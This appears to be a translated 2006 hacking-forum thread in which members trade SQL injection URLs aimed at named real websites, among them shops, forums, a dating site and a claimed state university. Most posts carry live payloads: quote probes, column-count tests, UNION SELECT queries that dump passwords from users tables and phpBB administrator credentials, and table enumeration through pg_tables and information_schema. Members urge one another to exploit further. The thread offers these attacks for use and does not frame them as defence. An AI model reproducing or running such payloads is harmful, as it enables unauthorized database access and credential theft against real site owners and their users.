SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. aleks28

    aleks28 New Member

    Joined:
    16 Sep 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    http://www.alparysoft.ru/products.php?id=10&item=-1'
     
  2. aleks28

    aleks28 New Member

    _http://www.flirtanica.ru/articles1.php?id=35'
     
  3. aleks28

    aleks28 New Member

    I can't find the number of fields... I went a different way, and there are problems here too...
    Give it a try, maybe someone will manage... if you do, post back!
    http://artflash.guelman.ru/profile.php?l=ru&id=-1'%20or%20password!=uname%20or%20id='-1
     
  4. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    http://www.flirtanica.ru/articles1.php?id=-10+union+select+1,adres,3,4,price+from+party+where+id=264/*
    Is there really an SQL injection in the second one? Where is the error?
     
    3 people like this.
  5. aleks28

    aleks28 New Member

    The error is not displayed, but it is there...
    It is handled by PHP itself.
     
  6. aleks28

    aleks28 New Member

    http://www.zooclub.ru/indexr.php?id=4'
     
  7. aleks28

    aleks28 New Member

    http://www.gelezo.net/files.php?id=-1'
     
  8. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    Whoever manages to dig further, please send examples by PM.
    PostgreSQL 7.3.4 on i386-portbld-freebsd4.8, compiled by GCC 2.95.4

    _http://www.littlegirl.tv/cgi-bin/message.cgi?p=-19+UNION+SELECT+1,'2',tablename+from+pg_tables+where+tablename+not+in+('agency_banner_click','agency_mst','campaign','domain','domain2','errmsg_mst','errmsg_mst','errmsg_mst','mail_template','nyukin','option','pg_aggregate','pg_am','pg_amop','pg_amproc','pg_attrdef','pg_attribute','pg_cast','pg_class','pg_conversion')--
     
    2 people like this.
  9. pop_korn

    pop_korn Elder - Старейшина

    _http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-49+union+select+null,username,user_password+from+phpbb_users+where+user_level=1
     
  10. T3st3R

    T3st3R New Member

    Joined:
    17 Jul 2006
    Messages:
    12
    Likes Received:
    3
    Reputations:
    3
    http://www.neotstoy.ru/?news&read=-44fc2de67f249'%20union%20select%201,2,3,'user',5,6,7,8,9,10,11%20/*
    I simply have no idea what to do with it next)
     
  11. CyberPunk

    CyberPunk Elder - Старейшина

    Joined:
    25 May 2006
    Messages:
    115
    Likes Received:
    38
    Reputations:
    10
    http://j-a.ru/galleryvech.php?name_gall=1'
     
  12. pop_korn

    pop_korn Elder - Старейшина

    http://www.saworship.com/article-page.php?ID=-2875

    39 columns
     
  13. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Here is an SQL injection on a state university.

     
  14. pop_korn

    pop_korn Elder - Старейшина

    http://www.grovesinternet.com/stormtrack/product.asp?categoryid=777
     
  15. TreniX

    TreniX Elder - Старейшина

    Joined:
    27 May 2006
    Messages:
    19
    Likes Received:
    25
    Reputations:
    26
    http://referat.com.ua/referat_show.php?id=1068325882'union+select+null,null,null,null,null,null,null/*
     
    #55 TreniX, 29 Sep 2006
    Last edited: 30 Sep 2006
  16. pop_korn

    pop_korn Elder - Старейшина

    Something weird is going on with the quotes.
    _http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,table_name,null,null,null,null,null,null,null,null,null+from+information_schema.tables--
     
  17. pop_korn

    pop_korn Elder - Старейшина

    http://www.kazanova.com.ua/product.php?id=-296+UNION+SELECT+1,2,password,4,5,6,7,8,9,10,11,12,13,14+from+users/*
     
  18. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Here is another one, a full-fledged one; enjoy.
     
    4 people like this.
  19. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20/*
     
  20. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    http://binet.com.ua/dir/index.php?cat=-1'%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null/*
     